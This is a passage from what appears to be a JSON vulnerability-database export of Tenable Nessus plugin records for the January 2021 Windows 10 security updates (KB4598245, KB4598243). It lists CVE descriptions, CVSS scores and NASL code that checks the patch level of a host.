(CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598245: Windows 10 Version 1803 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1682", "CVE-2021-1681", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1662", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1670", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1672", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1663", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1646", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598245.NASL", "href": "https://www.tenable.com/plugins/nessus/144880", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144880);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598245\");\n script_xref(name:\"MSFT\", value:\"MS21-4598245\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598245: Windows 10 Version 1803 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598245/windows-10-update-kb4598245\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8f58c04\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598245.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598245'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598245])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:49", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598243: Windows 10 Version 1607 and Windows Server 2016 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1681", "CVE-2021-1691", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1645", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1692", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598243.NASL", "href": "https://www.tenable.com/plugins/nessus/144882", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144882);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n 